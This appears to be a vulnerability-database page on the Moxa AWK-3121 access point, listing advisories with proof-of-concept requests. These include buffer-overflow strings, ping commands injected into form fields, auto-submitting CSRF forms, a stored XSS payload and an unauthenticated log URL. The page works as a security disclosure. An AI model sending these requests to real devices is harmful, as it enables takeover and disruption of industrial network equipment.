[Attack Vectors] An attacker can sniff the HTTP traffic passing between the user and the device by using a MITM attack such as ARP poisoning.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It is intended that an administrator can download /systemlog.log (the system log).
[Additional Information] POC http://192.168.127.253//systemlog.log
[Vulnerability Type] Incorrect Access Control
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can navigate to URL and download the systemlog file without any authentication or authorization
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The session cookie "Password508" does not have an HttpOnly flag.
[VulnerabilityType Other] Missing HttpOnly flag on session cookie
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can use cross-site scripting attack to access the session cookie "Password508" which can allow an attacker to login into the device.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It provides ping functionality so that an administrator can execute ICMP calls to check if the network is working correctly. By crafting a packet that contains a string of 516 characters, it is possible for an attacker to execute the attack.
[Additional Information] POC
POST /forms/webSetPingTrace HTTP/1.1 Cookie: Password508=6d86219d9cca208c1085cce81fdd31f0
srvName=AAAAAA (etc.) EEEEEE&option=0&bkpath=%2Fping_trace.asp
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute a buffer overflow on the device
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The device provides a Wi-Fi connection that is open and does not use any encryption mechanism by default. An administrator who uses the open wireless connection to set up the device can allow an attacker to sniff the traffic passing between the user's computer and the device. This can allow an attacker to steal the credentials passing over the HTTP connection as well as TELNET traffic. Also an attacker can MITM the response and infect a user's computer very easily as well.
[VulnerabilityType Other] Open WiFi Connection
[Vendor of Product] Moxa
[Affected Product Code Base] AWK 3121 - 1.14
[Affected Component] Device
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can monitor the Wifi channels using Kismet or some other opensource software and an wireless card in monitor mode and sniff all the traffic including HTTP traffic as well as SSH and Telnet traffic.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- By crafting a packet that contains a string of 678 characters, it is possible for an attacker to execute the attack.
[Additional Information] POC POST /forms/web_SendTestEmail HTTP/1.1 Cookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f
server=server.mail.com&username=test&password=test&from=test@mail.com&to1=AAAAAAAAAA (etc.)
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK 3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute the buffer overflow
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[Additional Information] POC to change name of the device
<html <body <form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded" <input type="hidden" name="iw_board_deviceName" value="AWK-ROMEO" / <input type="hidden" name="iw_board_deviceLocation" value="" / <input type="hidden" name="iw_board_deviceDescription" value="" / <input type="hidden" name="iw_board_deviceContactInfo" value="" / <input type="hidden" name="Submit" value="Submit" / <input type="hidden" name="bkpath" value="/sysinfo.asp " / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
<html <body <form id="f" action="http://192.168.127.253/forms/webSetMainRestart" method="GET" enctype="application/x-www-form-urlencoded" <input type="hidden" name="SaveValue" value="1" / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
[Vulnerability Type] Cross Site Request Forgery (CSRF)
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Impact Escalation of Privileges] true
[Impact Information Disclosure] true
[Attack Vectors] An attacker can trick an administrator of the device to visit an attacker controlled page while connected to the network and thus trick to change the password or any other setting
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The Moxa AWK 3121 provides ping functionality so that an administrator can execute ICMP calls to check if the network is working correctly. By crafting a packet that contains shell metacharacters, it is possible for an attacker to execute the attack.
[Additional Information] POC
POST /forms/webSetPingTrace HTTP/1.1 Cookie: Password508=e07f98b965bcc5abfe11c9c763b2d333
srvName=192.168.127.102;ping -c 8 192.168.127.101;##&option=0&bkpath=%2Fping_trace.asp
[VulnerabilityType Other] Command injection in Ping functionality
[Vendor of Product] Moxa
[Affected Product Code Base] AWK 3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The device enables an unencrypted TELNET service by default. This allows an attacker who has been able to gain an MITM position to easily sniff the traffic between the device and the user. Also an attacker can easily connect to the TELNET daemon using the default credentials if they have not been changed by the user.
[VulnerabilityType Other] Insecure service Telnet enabled by default
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Telnet daemon
[Attack Type] Remote
[Impact Code execution] true
[Impact Information Disclosure] true
[Attack Vectors] An attacker can sniff the traffic passing between the device and user by using a MITM attack such as ARP poisoning
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The Moxa AWK 3121 provides certfile upload functionality so that an administrator can upload a certificate file used for connecting to the wireless network. By crafting a packet that contains shell metacharacters, it is possible for an attacker to execute the attack.
[Additional Information] POC POST /forms/web_certUpload HTTP/1.1 Cookie: Password508=68abf30ef8176a4248320929e04df562
... 114782935826962 Content-Disposition: form-data; name="iw_privatePass"
;ping -c 9 192.168.127.103 ##
... 114782935826962
Content-Disposition: form-data; name="bkpath"
/wireless_cert.asp?index=1 ... 114782935826962 Content-Disposition: form-data; name="certSection"
certWlan ... 114782935826962 Content-Disposition: form-data; name="rfindex"
0 ... 114782935826962 Content-Disposition: form-data; name="Submit"
Submit ... 114782935826962 Content-Disposition: form-data; name="certFile1"
test.txt ... 114782935826962 Content-Disposition: form-data; name="certFile"; filename="blob" Content-Type: text/xml
<a id="a"<b id="b"hey!</b</a ... 114782935826962--
[VulnerabilityType Other] Command injection in file upload
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[Additional Information] POC <html <body <form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded" <input type="hidden" name="iw_board_deviceName" value="AWK<\/td');alert(1);//" / <input type="hidden" name="iw_board_deviceLocation" value="" / <input type="hidden" name="iw_board_deviceDescription" value="" / <input type="hidden" name="iw_board_deviceContactInfo" value="" / <input type="hidden" name="Submit" value="Submit" / <input type="hidden" name="bkpath" value="/sysinfo.asp " / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
[Vulnerability Type] Cross Site Scripting (XSS)
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.9
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Impact Escalation of Privileges] true
[Impact Information Disclosure] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute a stored XSS on the device.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- By crafting a packet that contains a string of 162 characters, it is possible for an attacker to execute the attack.
[Additional Information] POC POST /forms/web_runScript HTTP/1.1 Cookie: Password508=071b1093656adca3510d5e32f69737ec
... 7e21a62f2905ca Content-Disposition: form-data; name="iw_filename"; filename="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC" Content-Type: application/octet-stream
ls -ltr ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_storage"
tftp ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_serverip"
ping -c 3 192.168.127.101
... 7e21a62f2905ca
Content-Disposition: form-data; name="bkpath"
/Troubleshooting.asp ... 7e21a62f2905ca--
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute buffer overflow
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[Additional Information] POC
<html <body <script function submitRequest() { var formData = new FormData();
formData.append("iw_filename", ";ping -c 9 192.168.127.103 ##");
formData.append("iw_storage", "tftp");
formData.append("iw_serverip", "192.168.1.101");
formData.append("bkpath", "/wireless_cert.asp?index=1");
// HTML file input, chosen by user formData.append("certFile1", "test.txt");
// JavaScript file-like object var content = '<a id="a"<b id="b"hey!
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201906-0792",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "awk-3121",
"scope": "eq",
"trust": 1.8,
"vendor": "moxa",
"version": "1.14"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015600"
},
{
"db": "NVD",
"id": "CVE-2018-10702"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:awk-3121_firmware:1.14:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:awk-3121:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-10702"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Samuel Huntley",
"sources": [
{
"db": "PACKETSTORM",
"id": "153223"
}
],
"trust": 0.1
},
"cve": "CVE-2018-10702",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-10702",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-120488",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-10702",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-10702",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201906-330",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-120488",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2018-10702",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120488"
},
{
"db": "VULMON",
"id": "CVE-2018-10702"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015600"
},
{
"db": "NVD",
"id": "CVE-2018-10702"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-330"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered on Moxa AWK-3121 1.14 devices. It provides functionality so that an administrator can run scripts on the device to troubleshoot any issues. However, the same functionality allows an attacker to execute commands on the device. The POST parameter \"iw_filename\" is susceptible to command injection via shell metacharacters. Moxa AWK-3121 The device contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Moxa AWK-3121 is an industrial-grade wireless access point produced by Moxa Corporation of Taiwan, China. This vulnerability stems from the fact that the network system or product does not correctly filter special elements in the process of constructing executable commands from external input data. \n The device by default allows HTTP traffic thus\n providing an insecure communication mechanism for a user connecting to\n the web server. This allows an attacker to sniff the traffic easily and\n allows an attacker to compromise sensitive data such as credentials. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n HTTP traffic by default\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can sniff the HTTP traffic passing between the user and the device by using a MITM attack such as ARP poisoning. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n \n2. \n It is intended that an administrator can download /systemlog.log (the system\n log). \n \n ------------------------------------------\n \n [Additional Information]\n POC \n http://192.168.127.253//systemlog.log\n \n ------------------------------------------\n \n [Vulnerability Type]\n Incorrect Access Control\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can navigate to URL and download the systemlog file without any authentication or authorization\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n3. \n The session cookie \"Password508\" does not have an HttpOnly flag. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Missing HttpOnly flag on session cookie\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can use cross-site scripting attack to access the session cookie \"Password508\" which can allow an attacker to login into the device. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n4. \n It provides ping functionality so that an administrator\n can execute ICMP calls to check if the network is working correctly. By crafting a packet that contains a string of\n 516 characters, it is possible for an attacker to execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n \n POST /forms/webSetPingTrace HTTP/1.1\n Cookie: Password508=6d86219d9cca208c1085cce81fdd31f0\n \n srvName=AAAAAA (etc.) EEEEEE\u0026option=0\u0026bkpath=%2Fping_trace.asp\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute a buffer overflow on the device\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n5. \n The device provides a Wi-Fi connection that is open and does not use\n any encryption mechanism by default. An administrator who uses the\n open wireless connection to set up the device can allow an\n attacker to sniff the traffic passing between the user\u0027s computer and the\n device. This can allow an attacker to steal the credentials passing\n over the HTTP connection as well as TELNET traffic. Also an attacker\n can MITM the response and infect a user\u0027s computer very easily as\n well. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Open WiFi Connection\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Device\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can monitor the Wifi channels using Kismet or some other\n opensource software and an wireless card in monitor mode and sniff all\n the traffic including HTTP traffic as well as SSH and Telnet traffic. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n6. By crafting\n a packet that contains a string of 678 characters, it is\n possible for an attacker to execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n POST /forms/web_SendTestEmail HTTP/1.1\n Cookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f\n \n server=server.mail.com\u0026username=test\u0026password=test\u0026from=test@mail.com\u0026to1=AAAAAAAAAA (etc.)\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute the buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n7. \n \n ------------------------------------------\n \n [Additional Information]\n POC to change name of the device \n \n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/iw_webSetParameters\" method=\"POST\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"iw_board_deviceName\" value=\"AWK-ROMEO\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceLocation\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceDescription\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceContactInfo\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"Submit\" value=\"Submit\" /\n \u003cinput type=\"hidden\" name=\"bkpath\" value=\"/sysinfo.asp \" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/webSetMainRestart\" method=\"GET\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"SaveValue\" value=\"1\" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [Vulnerability Type]\n Cross Site Request Forgery (CSRF)\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Escalation of Privileges]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can trick an administrator of the device to visit an\n attacker controlled page while connected to the network and thus trick\n to change the password or any other setting\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n8. \n The Moxa AWK 3121 provides ping functionality so that an administrator\n can execute ICMP calls to check if the network is working correctly. By crafting a packet that contains shell metacharacters,\n it is possible for an attacker to\n execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \n POST /forms/webSetPingTrace HTTP/1.1\n Cookie: Password508=e07f98b965bcc5abfe11c9c763b2d333\n \n srvName=192.168.127.102;ping -c 8 192.168.127.101;##\u0026option=0\u0026bkpath=%2Fping_trace.asp\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in Ping functionality\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n9. \n The device enables an unencrypted TELNET service by default. This allows an\n attacker who has been able to gain an MITM position to easily sniff the\n traffic between the device and the user. Also an attacker can easily\n connect to the TELNET daemon using the default credentials if they have\n not been changed by the user. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Insecure service Telnet enabled by default\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Telnet daemon\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can sniff the traffic passing between the device and user by using a MITM attack such as ARP poisoning\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n10. \n The Moxa AWK 3121 provides certfile upload functionality so that an\n administrator can upload a certificate file used for connecting to the\n wireless network. By crafting a packet that contains shell metacharacters,\n it is possible\n for an attacker to execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n POST /forms/web_certUpload HTTP/1.1\n Cookie: Password508=68abf30ef8176a4248320929e04df562\n \n ... 114782935826962\n Content-Disposition: form-data; name=\"iw_privatePass\"\n \n ;`ping -c 9 192.168.127.103` ##\n ... 114782935826962\n Content-Disposition: form-data; name=\"bkpath\"\n \n /wireless_cert.asp?index=1\n ... 114782935826962\n Content-Disposition: form-data; name=\"certSection\"\n \n certWlan\n ... 114782935826962\n Content-Disposition: form-data; name=\"rfindex\"\n \n 0\n ... 114782935826962\n Content-Disposition: form-data; name=\"Submit\"\n \n Submit\n ... 114782935826962\n Content-Disposition: form-data; name=\"certFile1\"\n \n test.txt\n ... 114782935826962\n Content-Disposition: form-data; name=\"certFile\"; filename=\"blob\"\n Content-Type: text/xml\n \n \u003ca id=\"a\"\u003cb id=\"b\"hey!\u003c/b\u003c/a\n ... 114782935826962--\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in file upload\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n 